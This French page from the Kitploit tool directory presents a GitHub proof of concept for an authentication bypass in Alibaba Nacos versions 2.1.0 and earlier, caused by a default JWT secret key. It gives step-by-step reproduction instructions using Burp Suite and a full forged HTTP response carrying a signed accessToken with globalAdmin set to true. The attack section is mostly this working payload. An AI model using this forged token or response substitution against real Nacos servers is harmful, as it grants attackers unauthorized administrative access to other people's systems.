Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Alibab-Nacos-Unauthorized-Login — Alibab Nacos Unauthorized Login | Kitploit
Outils/GitHubGitHub/al1ex/alibab-nacos-unauthorized-login
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubal1ex/alibab-nacos-unauthorized-login

Alibab-Nacos-Unauthorized-Login

Alibab Nacos Unauthorized Login

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
142il y a 3 ansPas encore vérifié

Impact de la vulnérabilité

Un problème a été découvert dans Nacos affectant les versions Nacos <= 2.1.0. Les utilisateurs de Nacos utilisent la clé JWT par défaut, ce qui entraîne une vulnérabilité d'accès non autorisé. Grâce à cette vulnérabilité, les attaquants peuvent contourner l'authentification par nom d'utilisateur et mot de passe et se connecter directement à l'utilisateur Nacos.

Produit vulnérable

Version Nacos <= 2.1.0

Reproduction de la vulnérabilité

Étape 1:Accédez directement au site Web de Nacos, saisissez un nom d'utilisateur et un mot de passe quelconques et utilisez Burpsuite pour capturer le paquet.

login

Étape 2:Interceptez le paquet de réponse.

response

Étape 3: Modifiez le paquet de données comme suit

root@kitploit:~
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

new

Étape 4: Connectez-vous avec succès après avoir relâché le paquet de données.

success

Télécharger l’outil